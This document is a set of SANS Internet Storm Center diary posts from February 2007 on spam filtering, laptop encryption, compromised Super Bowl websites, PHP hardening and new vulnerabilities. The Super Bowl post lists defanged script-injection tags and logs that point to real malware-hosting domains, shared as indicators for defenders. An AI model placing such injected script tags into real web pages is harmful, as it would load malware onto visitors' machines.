MD5: a7219fc65ea45252850e483a109cf0b3
SHA1: 261bac500ceedbd360768a193daf55b6b199de04


Published: 2007-02-06

New Samba release fixes security issues

Samba-3.0.24 was released yesterday to fix 3 security vulnerabilities.  Anyone running an older version should take a look at the release notes and seriously consider upgrading (there are also patches against 3.0.23d available on the Samba site).



Published: 2007-02-05

More on dealing with image spam

During my last shift on 15 Jan, I did a story on dealing with the image spam that I was getting on the little mail server I run at home.  I got quite a few excellent responses to that story, so I wanted to summarize those and share them with our readers.  My thanx to Steve, Dave, Tim, Alexander, Joanne, and John (I hope I didn't miss anyone).


Several people suggested looking at dspam.  Some people said they had given up on SpamAssassin and gone strictly with dspam.  I've added dspam to the mix, and mostly get pretty good results.  The biggest problem I'm seeing with dspam is that it still is not detecting some of the image spam that takes its text from legit sources on the internet.  FuzzyOCR and some of the blocklists seem to catch most of these, but even feeding all the false negatives back through dspam for training, some are still getting through.  Having said that, I like dspam and will definitely keep it in the mix.  I've had a suggestion (that I haven't tried yet) that I should run dspam outside of amavisd-new rather than from within it which is how I am running it now.


Steve suggested I take a look at the clamav phish and scam rules from sanesecurity.com which can be found here.  I haven't tried them out, yet.  If you do, let me know what you think.


I didn't mention it, but I do, in fact, do greylisting using gld (readers also suggested postgrey and sqlgrey) in my postfix setup.  Unfortunately, because most of the addresses that receive mail on my server are forwarded from elsewhere, and those other sites have already accepted the e-mail, greylisting is only moderately useful in my personal situation, but I recommend trying it out.  I also should note that because I sometimes *want* to get spam and viruses at some of these e-mail addresses (including my isc.sans.org address), I turn off spam and virus filtering at these forwarding services.  If your job (or hobby) doesn't include playing with malware, leaving that filtering turned on might save you from some of the problems that I've been seeing.

DNS blocklists

Several folks suggested the blocklists such as the Spamhaus sbl+xbl list.  I actually have those configured in postfix and I have the DNSBL SpamAssassin rules (25_uribl.cf) enabled.  As with greylisting, the postfix use of the blocklists doesn't help if another MTA has already accepted the mail and is forwarding it to me, but the SpamAssassin usage then increases the score if it detects those source IPs in the Received: headers.

block dynamic IPs

This argument tends to take on the tone of religious argument and I'm not going to rehash that all here.  Yes, I'm aware that most spambots seem to be infected home machines and that if I rejected all mail from them and/or if ISPs blocked outbound e-mail from them that would greatly reduce the problem.  It would also punish people like me who have a domain website and e-mail (very low volume) hosted on my home system connected to the internet via cable modem.  Having said that, some of the DNSBLs discussed above, do, in fact, block e-mail from dynamic IP ranges.  Also, as noted above, that isn't quite as useful in my particular case as it might be because of the forwarding.

block all gif images

One suggestion was to block all gif images (either block e-mail containing them or strip them from the e-mail).  This is another suggestion I haven't tried and probably won't in the near future.  There can certainly be some backlash and/or collateral damage with this one, but since I'm reading my e-mail as plain text, I wouldn't really miss most of those images.  One reader suggested that there was some fallout because of the company logo gifs getting dropped, so this person adjusted the rules to block gifs over a certain size.  Of course, if you drop gifs, what about jpegs?  other image types?  mis-identified image types?

playing with SA scores for mailing lists

Finally, another reader commented that they were able to cut out some of the mailing list spam by some judicious playing with the scores assigned by SpamAssassin.  This amounts to, giving mail to the mailing list an initial negative score (assume that most mail to the list is not spam) and then giving it an additional higher score if the Bayes tests show it is likely to be spam (e.g., add back another few points if it hits on BAYES_95 or BAYES_99, etc.).  As a result of discussions with this reader I joined the spamassassin-users list and have had to tweak some of my own scoring to deal with (half-)false positives on that list.  Imagine, a mailing list that deals with a tool from assassinating spam, might actually include samples of spam.  Doh!

Jim Clausing, jclausing ++at++ isc dot sans dot org


Published: 2007-02-05

More VA data lost... Laptop encryption anyone?

A Portable hard drive with potentially 48,000 veterans information is missing from a VA medical facility in Birmingham Alabama.  In an interesting development, Rep Spencer Bachus, R-Ala. said that over half of the information was not encrypted.  This implies that just under half were... I wonder what solution they are using.

The Bush administration gave agencies 45 days from June 23rd, 2006 to comply with 2 factor authentication and drive encryption standards set forth by NIST and the NSA.

Official Whitehouse memo on hard drive encryption:

"1. Encrypt all data on mobile computers/devices which carry agency data unless the data
is determined to be non-sensitive, in writing, by your Deputy Secretary or an
individual he/she may designate in writing; "

The topic of laptop/hardrive encryption is a very hot one.  Almost all of my clients are asking for solutions, and thoughts on the matter.  Some of them have rolled out Utimaco, with mostly positive results.  Others have gone with PGP Universal, choosing one solution for both disk and email encryption.

What are your organizations using?  Perhaps this will be a new poll.

Mike Poor
SANS Internet Storm Center Handler on Duty


Published: 2007-02-04

Super Bowl Infection - More Sites

[See the update below]

On Friday we reported that the Dolphins Stadium (home of the 2007 Super Bowl) was infected with a scripted pointer to malware that exploited two patchable Microsoft Windows vulnerabilities.  While doing research on that issue we uncovered many more sites that contain similar references.  Here is a list of the some of the ones we found, many have already been cleaned up but many have not.  System administrators might want to check their network flow logs for any traffic to these sites, and for any traffic to the five sites that hosted the hostile Java script.

It looks like the "1.js" intrusions happened around the first of January while the "3.js" intrusions occured near the end of January.  We cannot find any evidence of a "2.js" or "4.js" script.  In the references below, I changed the word "script" to "skript" in order to prevent any accidental mis-fires.

<skript src="http://w1c.cn/3.js"></skript>

<skript src="http://dv521.com/3.js"></skript>

<skript src="http://www.natmags.co.uk/3.js"></skript>

<skript src="http://bc0.cn/3.js"></skript>

<skript src="http://bc0.cn/1.js"></skript>

<skript src="http://137wg.com/1.js"></skript>

A common theme seems to be an attack on hospital or medical care sites, although that is not completely the case.  We checked to see if this was a mass attack on one service provider but other than a lot of *.squizzle.com sites it does not appear to be this type of attack.

[UPDATE 5 Feb 07 1754Z]

A reader sent us this:

I think the 1.js problem goes back a bit further in time. I found these logs:

Fri Dec 1 10:08:44 2006: x.x.x.x -> 54995 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Wed Dec 6 11:42:05 2006: x.x.x.x -> 55089 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Mon Dec 11 14:17:04 2006: x.x.x.x -> 51732 -> 80 GET /1.js HTTP/1.0 (bc0.cn)
Thu Dec 21 12:17:55 2006: x.x.x.x -> 48628 -> 80 GET /1.js HTTP/1.0 (bc0.cn)

...which makes us curious as to when this incident started.  If you could check your logs and let us know about detections prior to December 1st 2006 we would greatly appreciate it.  We'll post an update here later today or tonight.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-02-04

Securing Apache/PHP

Nathan wrote in earlier with attempts to exploit PHP file inclusion that his server had automatically thwarted. He's promoting the use of mod_security, mod_evasive, fail2ban and suhosin in a Apache/PHP environment.

Since knowledge and experience is a way to win from the bad guys, how about sharing your favorite setup for Apache /PHP security (Basically a "LAMP" environment although I'd rather not focus on the OS part in there) and we'll summarize on this page. Also let us know what you like of the components you use, why they are your favorite etc.







Nathan used this tool to ban IP addresses doing repeated 404/501 error results.  He catches attempts to hack forums based on PHP this way, and was able to trace it back to owned servers doing those attacks towards him.



Swa Frantzen -- net2s.com


Published: 2007-02-03

Solution for: The Twelve Days of Christmas Packet Challenge

Once again, I want to thank everyone that participated.  I received alot of requests for more packet challenges which warms my heart:>)   This packet challenge was fun to create and the responses back were awesome as well.  I'm working to put together a series of challenges.  I hope to have the first one posted in the very near future so stay tuned!  For this packet challenge, you can find the packets here if you would like to give it a try and missed it over the holidays.  If so, stop reading now cause I'm going to reveal the correct answer.  I would like to say congratulations to the following folks who submitted correct answers and I hope I didn't miss anyone.  A job well done:

Michael Brown and Kenny Long (sent as a joint effort)
Brandon Greenwood
Nicholas Albright
J. Mike Rollins
Morgan Bailey
Andre M. DiMino

To solve the packet challenge, you needed to first decode the data contained in each packet.  The data was encoded using Base64.  There are lots of tools and scripts around that will encode/decode Base64 for you.  Once you got the data decoded, you had to decide the correct order the data from the packets should be arranged in to see what the handlers were giving you for Christmas.  The song it was based on was the 12 days of Christmas and the correct ordering of the packets could be accomplished by putting the Sequence Numbers in increasing order.  Here is the data decoded and in its correct order:

On the xxxx day of christmas the handlers gave to me a packet capture in its entirety
On the xxxx day of christmas the handlers gave to me xxxx C&Cs
On the xxxx day of christmas the handlers gave to me xxxx phat bots
On the xxxx day of christmas the handlers gave to me xxxx orange smurfs
On the xxxx day of christmas the handlers gave to me xxxx Token Rings
On the xxxx day of christmas the handlers gave to me xxxx sensors failing
On the xxxx day of christmas the handlers gave to me xxxx worms a spreading
On the xxxx day of christmas the handlers gave to me xxxx servers crashing
On the xxxx day of christmas the handlers gave to me xxxx phishers phishing
On the xxxx day of christmas the handlers gave to me xxxx logs for analyzing
On the xxxx day of christmas the handlers gave to me xxxx hackers hacking
On the xxxx day of christmas the handlers gave to me xxxx geeks a sleeping

I hope everyone who tried this had fun.  If you have questions, please feel free to ask.  If you have some interesting packets that you think might make for a good challenge and can share them, please pass them our way.  We can obfuscate them however you like.  This way we can all learn and have some fun together. 


Published: 2007-02-03

New, Unpatched Office Vulnerability

Microsoft has released an advisory for a remote code execution vulnerability in Microsoft Office.  It is currently being reported to target  only Microsoft Excel at this point.  However according to Microsoft's advisory:  "While we are currently only aware that Excel is the current attack vector, other Office applications are potentially vulnerable."  It has a CVE entry of CVE-2007-0671, although I could not find it in the database at this time and there is very limited information available.  The advisory applies to the following products:

Office 2000
Office XP
Office 2003
Office 2004 for Mac
Office 2004 v. X for Mac

Just keep reminding folks to exercise caution when opening attachments received via email or documents found on the internet. 


Published: 2007-02-02

Classic phpBB vulnerability impacts phpBB-based forums

It seems fairly obvious but the classic phpbb_root_path vulnerability is present in products such as: Omegaboard, Cerulean Portal System, phpBB Tweaked, Hailboards, EclipseBB and Xero Portal.  All are affected by the vulnerability exposed by having register_globals set to "on."  It appears that it is being regularly exploited as well to deface systems.
Thanks for the lead Juergen!


Published: 2007-02-02

American Football Championship Shenanigans

Websense Labs has reported that "the official website of Dolphin Stadium has been compromised with malicious code."  As of now (~1820 GMT 02-FEB-2007) the site still has the injected redirect, but the site hosting the malicious code is not responding.  The malicious script is reported to exploit vulnerabilities described in Microsoft Security Bulletins MS06-014 and MS07-004.


Published: 2007-02-02

Friday Security Notes

Just a few things to read/follow-up/keep-an-eye-on over the weekend:

Wireshark announced a few Denial of Service vulnerabilities (i.e. it sees certain traffic and crashes) yesterday: www.wireshark.org/security/wnpa-sec-2007-01.html

Keep an eye out for 0.99.5 to be released soon.

Exploit code is available Computer Associates BrightStor ARCserve Backup LGSERVER.EXE
The targeted service listens on TCP/1900.  The example exploit sets up a shell on TCP/4444 (but that's trivial to change)
Dshield notes a bit of a peak: isc.sans.org/port.html?port=1900
Concentrated activity towards TCP/4400 is a bit less obvious.

Cisco Vulnerabilities, there were a few issues identified by Cisco this week.  Keep an eye/ear/SEC-rule out for "instability issues" on your routing infrastructure.  For current details:


Published: 2007-02-01

Simon says: download backdoor.exe (or using Vista Speech Command for fun and profit)

Once in a while security researchers ask themselves simple questions to which they sincerly hope the answer is "of course not!".

This is the story of a question to which the answer is "oh my, this is fun!".

On January 30th Sebastian Krahmer asked himself (out loud on the Dailydave mailing list) if Windows Vista Speech Command function could be used by a malicious website feeding a wav file which would speak commands to download malware.  The idea is deceivingly simple: the wav file plays through the speakers, the microphone picks up the commands and the Speech Command happily executes them.

A fascinating discussion ensued, George Ou went off to research the concept and, at the risk of spoiling the surprise, here is the result in George's fine words:

"I recorded a sound file that would engage speech command on Vista, then engaged the start button, and then I asked for the command prompt.  When I played back the sound file with the speakers turned up loud, it actually engaged the speech command system and fired up the start menu.  I had to try a few more times to get the audio recording quality high enough to get the exact commands I wanted but the shocking thing is that it worked!"

Oh dear.

There are obviously a few obstacles to overcome to make this a viable attack like having to spell out a long URL so George tried to use the "tinyurl" service and indeed that worked just fine. The next question was whether it would work with untrained voices and George reported that it would happily work.

The best picture in my mind of this attack vector is a large trading room, in the middle of the night, and one computer shouting out loud "start listening", "start", "internet explorer", "download <some tinyurl>", etc.

So, how about prevention?  Well, the answer is that you should disable Speech Command for the time being or use it carefully and wait for Microsoft to issue a patch which ignore output from the computer's own speakers.

For those who are old enough to remember: about 15 years ago Apple introduced voice commands for MacOS and it was great fun to shout behind someone's back "shutdown" to see the Mac happily go into its shutdown routine. This was patched a while back on MacOS, as you can probably imagine, but it was a great prank.

Thanks to Gerrit Rothmaier for bringing it up at 08:42 this morning and dramatically improving my second espresso of the day.